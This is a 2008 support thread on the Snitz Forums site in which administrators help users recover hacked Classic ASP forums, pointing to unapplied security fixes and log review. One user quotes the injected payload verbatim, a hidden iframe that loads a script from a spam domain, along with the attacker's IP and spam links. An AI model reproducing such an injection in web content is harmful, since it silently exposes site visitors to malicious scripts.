Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 Help Groups for Snitz Forums 2000 Users
 Help: General / Classic ASP versions(v3.4.XX)
 Hacked again!!!!
 New Topic  Topic Locked
 Printer Friendly
Previous Page
Author Previous Topic Topic Next Topic
Page: of 2

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 04 January 2008 :  15:19:08  Show Profile  Send ruirib a Yahoo! Message
I ran setup.asp and the hack is no longer there. You will need to browse your logs and check what they did to hack the forum.

In December, two fixes were posted. You sure you added the last one?


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

Red01Z06
Starting Member

18 Posts

Posted - 04 January 2008 :  15:21:28  Show Profile
Ok, I needed to reset IIS in order to clear the hack. Edit the DB then IISRESET. What a mess.
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 04 January 2008 :  15:23:50  Show Profile  Send ruirib a Yahoo! Message
Nah, actually it was me, I ran setup.asp and it got back up immediately. I saw it happening .

Setup.asp gets the values from the DB, that's why it needed to be run.


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20600 Posts

Posted - 04 January 2008 :  15:24:15  Show Profile  Visit HuwR's Homepage
all you needed to do was edit the db and run setup.asp as rui said above, that resets the application variables.
Go to Top of Page

Red01Z06
Starting Member

18 Posts

Posted - 04 January 2008 :  15:24:54  Show Profile
LOL...cool, thanks

but, I had done full restores of all .ASP form last month and it was down after doing that.....(3 times)

Edited by - Red01Z06 on 04 January 2008 15:25:56
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20600 Posts

Posted - 04 January 2008 :  15:27:03  Show Profile  Visit HuwR's Homepage
it would really help if you could get us a copy of the IIS log file
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20600 Posts

Posted - 04 January 2008 :  15:28:51  Show Profile  Visit HuwR's Homepage
you need to ensure that you do not have any admin users that you are not aware of
Go to Top of Page

Red01Z06
Starting Member

18 Posts

Posted - 04 January 2008 :  15:34:09  Show Profile
the log file
link removed by HuwR after downloading
Go to Top of Page

Red01Z06
Starting Member

18 Posts

Posted - 04 January 2008 :  15:39:03  Show Profile
If you look in the log at 2008-01-04 07:01:04 you will see the problem I think.
Go to Top of Page

HuwR
Forum Admin

United Kingdom
20600 Posts

Posted - 04 January 2008 :  15:52:01  Show Profile  Visit HuwR's Homepage
that looks like you don't have the dec 1st security fix
Go to Top of Page

modifichicci
Average Member

Italy
787 Posts

Posted - 04 January 2008 :  16:06:58  Show Profile  Visit modifichicci's Homepage
You are running a forum based on Image forum code (no link in the foooter to him .. ) the security fix is different for that version.

Ernia e Laparocele
Forum di Ernia e Laparocele
Acces - MySql Migration Tutorial
Adamantine forum
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 04 January 2008 :  16:07:12  Show Profile  Send ruirib a Yahoo! Message
I concur with Huw. Seems like the forum was not properly patched. Please make sure the fix was added correctly.


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 04 January 2008 :  16:08:58  Show Profile  Send ruirib a Yahoo! Message
Ah... better check with him on how to fix it. And I remember from some emails changed with modifichicci that some more stuff needed fixing.


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page

erwindb
Starting Member

1 Posts

Posted - 07 January 2008 :  14:19:24  Show Profile
forum hacked today by 91.121.79.79

via iframe insert in F_DESCRIPTION field
<iframe src="http://www.rxspamonline.net/1/js_go_f1.ygyrthgrt" style="display:none"></iframe>

also spam messages a bit of everywhere

I installed all your patches in December.

How can I prevent this from happening in the future?

(if you want to know my forum's address send me a mail)

details hacker:
2934 1 pzpavwhr
email31105153@modmailcom.com http://www.wukrod.yoyo.pl/payingdebt.htm 91.121.79.79 http://www.kkqlqdtw.yoyo.pl/carisoprodolcheapest.htm http://www.tzwgao.yoyo.pl/carisoprodoladdiction.htm ...
Go to Top of Page

ruirib
Snitz Forums Admin

Portugal
26364 Posts

Posted - 07 January 2008 :  14:38:52  Show Profile  Send ruirib a Yahoo! Message
What forum version are you running? Which December update did you add? Do you have any forum logs we can look at?


Snitz 3.4 Readme | Like the support? Support Snitz too
Go to Top of Page
Page: of 2 Previous Topic Topic Next Topic  
Previous Page
 New Topic  Topic Locked
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.48 seconds. Powered By: Snitz Forums 2000 Version 3.4.07